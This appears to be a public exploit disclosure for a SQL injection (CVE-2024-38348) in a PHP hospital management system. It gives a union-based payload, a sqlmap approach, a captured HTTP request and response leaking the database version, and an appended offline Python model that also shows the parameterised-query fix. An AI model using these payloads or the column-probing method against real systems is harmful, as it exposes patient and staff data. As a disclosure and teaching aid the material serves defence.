# Exploit Title: Health Care hospital Management System - SQL Injection (Authenticated)
# Date: 2024-06-05
# Exploit Author: Sandeep Rajauriya
# Vendor Homepage: https://code-projects.org/health-care-hospital-in-php-css-js-and-mysql-free-download/
# Software Link: https://download-media.code-projects.org/2020/04/Health_Care_hospital_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD_AkGgvwi.zip
# Version: 1.0
# Tested on: Windows 11, PHP 8.2.12, Apache 2.4.58
# CVE: CVE-2024-38348
------------------------------------------------------------------------------------
1. Description:
----------------------
Health Care hospital Management System 1.0 allows SQL injection via the "searvalu" parameter of the "Staff Info" module (sestaffactmem.php): the search value is placed into a database query without being treated as data. An authenticated user can exploit this to read or modify data in the application's database, compromise the application itself, or leverage further weaknesses in the underlying database server.
2. Proof of Concept:
----------------------
Point sqlmap at the 'searvalu' POST parameter of sestaffactmem.php, supplying a valid session cookie since the module requires a login, to confirm the injection and retrieve the database hostname and version; then let it dump the tables of interest. The same result can be obtained manually with the union-based payload below:
3. Example payload:
----------------------
'+union+select+@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null--+
The 15 columns in the union match the number of columns returned by the SELECT that sestaffactmem.php runs; the '+' characters are URL-encoded spaces, and the trailing '--+' becomes the MySQL '-- ' comment that discards the remainder of the original query, including its closing quote.
4. Burpsuite HTTP Request on 'searvalu' parameter:
----------------------
POST /HMS/sestaffactmem.php HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Origin: http://--REDACTED--
Connection: close
Referer: http://--REDACTED--/HMS/sestaffactmem.php
Cookie: PHPSESSID=podmt61i233pamo53i63gt78f7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
searvalu=test'+union+select+@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null--+&filter=
5. Burpsuite HTTP Response:
----------------------
HTTP/1.1 200 OK
Date: Wed, 05 Jun 2024 17:50:17 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7537
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
--REDACTED--
<h4 style=" color:">
Patient Reg.No : 10.4.32-MariaDB<br />
Patient Name : <br />
</h4>
<dl class="dl-horizontal">
--REDACTED--
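The mechanism behind the payload and response above, modelled offline as an added example (not code from the Health Care hospital Management System or from the exploit author): it assumes a small staff table and a LIKE-based query shape, both illustrative guesses rather than the application's real schema, substitutes SQLite's sqlite_version() for MySQL's @@version, and shows the column-count probe that leads to the 15 NULLs in the payload, the leak of the version string into the first rendered field, and the bound-parameter query that defeats the same payload.

```python
"""Offline model of the union-based SQL injection in the 'searvalu' parameter.

This is an added example, not code from the Health Care hospital Management
System. The real application is PHP on MySQL/MariaDB; the staff table, its
column names and the LIKE-based query shape below are assumptions made for
illustration, and SQLite's sqlite_version() stands in for MySQL's @@version.
"""
import sqlite3

# Constructed sample data (assumption: not the application's real schema).
SCHEMA = """
CREATE TABLE staff (id INTEGER PRIMARY KEY, name TEXT, role TEXT, phone TEXT);
INSERT INTO staff VALUES (1, 'Alice Smith', 'Nurse', '555-0100');
INSERT INTO staff VALUES (2, 'Bob Jones', 'Surgeon', '555-0101');
"""
NCOLS = 4  # the page's target needs 15 columns; this sample table has 4


def connect():
    """Open an in-memory database holding the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_search(db, searvalu):
    """Assumed shape of the flawed query: the request parameter is spliced
    straight into SQL text, so quotes and keywords in it become SQL."""
    sql = f"SELECT id, name, role, phone FROM staff WHERE name LIKE '%{searvalu}%'"
    return db.execute(sql).fetchall()


def safe_search(db, searvalu):
    """Hardened form: the value travels as a bound parameter and can only
    ever be compared as data, whatever characters it contains."""
    sql = "SELECT id, name, role, phone FROM staff WHERE name LIKE ?"
    return db.execute(sql, ("%" + searvalu + "%",)).fetchall()


def union_payload(expr, ncols, prefix="test"):
    """Build the page's payload shape: prefix' union select <expr>,null,...--
    The page shows it URL-encoded, with '+' standing for a space; the
    trailing space after '--' is what MySQL requires for a comment."""
    cols = ",".join([expr] + ["null"] * (ncols - 1))
    return f"{prefix}' union select {cols}-- "


def find_column_count(search, max_cols=32):
    """Probe how many columns the injected UNION must supply: the first count
    that does not raise a column-mismatch error matches the surrounding
    SELECT (sqlmap automates this step before dumping anything)."""
    for n in range(1, max_cols + 1):
        try:
            search(union_payload("null", n))
            return n
        except sqlite3.OperationalError:
            continue
    return None


def leak_version(db):
    """Reproduce the PoC: the expression in the first UNION column is rendered
    where the page prints 'Patient Reg.No', as in the captured response."""
    rows = vulnerable_search(db, union_payload("sqlite_version()", NCOLS))
    return rows[0][0]


if __name__ == "__main__":
    db = connect()
    print("columns needed:", find_column_count(lambda p: vulnerable_search(db, p)))
    print("leaked through vulnerable query:", leak_version(db))
    print("same payload as bound parameter:",
          safe_search(db, union_payload("sqlite_version()", NCOLS)))
```

Running the script shows the probe stopping at 4 (the page's target stops at 15), the SQLite version string appearing in the first column where the real application printed "10.4.32-MariaDB", and the identical payload returning no rows once it is bound as a parameter. The fix for the PHP application is the same idea: a prepared statement with the search term bound, never string concatenation into the query.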